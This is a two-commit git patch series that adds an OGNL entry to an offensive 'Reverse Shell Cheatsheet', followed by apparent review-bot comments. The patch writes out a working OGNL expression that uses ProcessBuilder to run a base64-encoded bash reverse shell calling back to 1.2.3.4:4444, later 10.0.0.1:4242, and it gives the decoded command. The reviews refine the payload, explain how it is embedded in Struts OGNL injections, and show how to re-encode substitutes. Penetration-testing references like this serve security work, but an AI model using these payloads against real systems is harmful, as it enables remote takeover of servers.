From 3d9363fdc96dbd2b96e5d102284565d9d70c156f Mon Sep 17 00:00:00 2001 From: ToastyCat <56387033+therealtoastycat@users.noreply.github.com> Date: Fri, 5 Jan 2024 09:50:43 +0100 Subject: [PATCH 1/2] Adding reverse shell payload for OGNL --- Methodology and Resources/Reverse Shell Cheatsheet.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index fe020727a1..9c75df995e 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -22,6 +22,7 @@ * [Netcat BusyBox](#netcat-busybox) * [Netcat Traditional](#netcat-traditional) * [NodeJS](#nodejs) + * [OGNL](#ognl) * [OpenSSL](#openssl) * [Perl](#perl) * [PHP](#php) @@ -252,6 +253,12 @@ ncat 10.0.0.1 4242 -e /bin/bash ncat --udp 10.0.0.1 4242 -e /bin/bash ``` +### OGNL + +```java +(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40LzQ0NDQgMD4mMScK | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start()) +``` + ### OpenSSL Attacker: From 05f441accf5d59e1d171076d38ecb26ae96ac034 Mon Sep 17 00:00:00 2001 From: ToastyCat <56387033+therealtoastycat@users.noreply.github.com> Date: Fri, 5 Jan 2024 10:25:39 +0100 Subject: [PATCH 2/2] Update Reverse Shell Cheatsheet.md adding details --- Methodology and Resources/Reverse Shell Cheatsheet.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 9c75df995e..3143336d92 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md 
@@ -256,9 +256,11 @@ ncat --udp 10.0.0.1 4242 -e /bin/bash ### OGNL ```java -(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40LzQ0NDQgMD4mMScK | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start()) +(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg== | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start()) ``` +With `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg==` decoding to `bash -c 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1'`, the payload within the single quotes might be changed by any Linux-compatible reverse shell. + ### OpenSSL Attacker:
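Review bot: In the `### OGNL` hunk of the first patch, the outer pipeline `echo ... | base64 -d | bash -i` pipes a script into an interactive bash, and the decoded script then starts a second shell via `bash -c 'bash -i >& ... 0>&1'`; the `-i` on the outer bash buys nothing when stdin is a pipe (it only produces "no job control" noise in a servlet container that has no terminal) and the `bash -c` wrapper is redundant, so `... | base64 -d | bash` with the decoded text reduced to `bash -i >& /dev/tcp/10.0.0.1/4242 0>&1` gives the same shell with one process fewer. The section also needs a sentence on where the expression goes: it is the command-execution part only, and `new java.lang.ProcessBuilder(...)` runs only where the evaluating application lets OGNL instantiate arbitrary classes (Struts 2 chains typically first disable the member-access restrictions), so say that it is meant to be embedded in an existing OGNL injection rather than presenting it as a stand-alone payload. Finally, the first patch hard-codes `1.2.3.4/4444` while every other entry in the file uses `10.0.0.1` and `4242`; the second patch corrects this, so the two commits should be squashed before merge.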
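Review bot: The sentence added after the fence in the second patch says the command "within the single quotes might be changed by any Linux-compatible reverse shell", but the expression carries that command only as base64, so a reader who edits the decoded text must re-encode it and paste the new string into `#a`; state that explicitly and show the step, e.g. `echo "bash -i >& /dev/tcp/10.0.0.1/4242 0>&1" | base64 -w0`, and say why the base64 wrapper is there at all (it keeps the quotes, `>`, `&` and `/` of the shell command out of the OGNL string literal and out of whatever URL or parameter the expression is injected through). Wording: "may be replaced with any Linux reverse shell from this page" rather than "might be changed by", and "With `...` decoding to" reads better as "The base64 string decodes to `...`;".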